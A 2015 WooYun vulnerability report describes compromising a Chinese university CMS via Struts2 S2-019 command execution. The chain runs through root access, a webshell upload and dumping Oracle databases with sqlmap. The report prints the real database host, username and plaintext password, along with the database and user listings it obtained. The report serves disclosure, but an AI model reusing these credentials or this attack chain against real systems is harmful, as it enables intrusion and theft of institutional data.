当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094854

漏洞标题:中国地质大学-远程命令执行导致可拖库

相关厂商:中国地质大学

漏洞作者: 路人甲

提交时间:2015-02-02 17:18

修复时间:2015-02-07 17:20

公开时间:2015-02-07 17:20

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

背景:存在s019远程命令执行漏洞
发展: 可上传webshell,数据库配置文件明文配置;
结果:导致可拖库;

详细说明:

s019就不说了,直接root权限;
然后传shell; 查看jdbconfig.xml;
发现数据库配置为明文;
外网无法直接连接数据库;
于是上传连接文件,配合sqlmap;
于是数据库就全出来了。竟然是DBA;

漏洞证明:

http://www.cugb.edu.cn/Cms/portal/read.action?id=4523 s019

whoami


root


/usr/local/soft/apache-tomcat-6.0.32/webapps/Cms/WEB-INF/classes>cat jdbc.properties
jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
jdbc.url=jdbc:oracle:thin:@202.204.105.50:1521/orcl
jdbc.username=cugbweb
jdbc.password=cugb_home_web_oracle


available databases [28]:
[*] APEX_030200
[*] APPQOSSYS
[*] BDWH
[*] CMS
[*] CTXSYS
[*] CUGB_HQ
[*] CUGB_PRD
[*] CUGBWEB
[*] DBSNMP
[*] DEVEP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIFERAY
[*] MDSYS
[*] MUSEUM
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RDSYSEDUV711415
[*] SCOTT
[*] ST10491
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


database management system users [42]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] BDWH
[*] CMS
[*] CTXSYS
[*] CUGB_HQ
[*] CUGB_PRD
[*] CUGBWEB
[*] DATALOOK
[*] DBSNMP
[*] DEVEP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIFERAY
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] MUSEUM
[*] NETADMIN
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] RDSYSEDUV711415
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] ST10491
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] XS$NULL


止于此处,防止查水表。


我的shell自己清理了,看了下还有其它的shell


修复方案:

s019自行百度


目前最重要的是修复后的清理了


版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-07 17:20

厂商回复:

最新状态:

暂无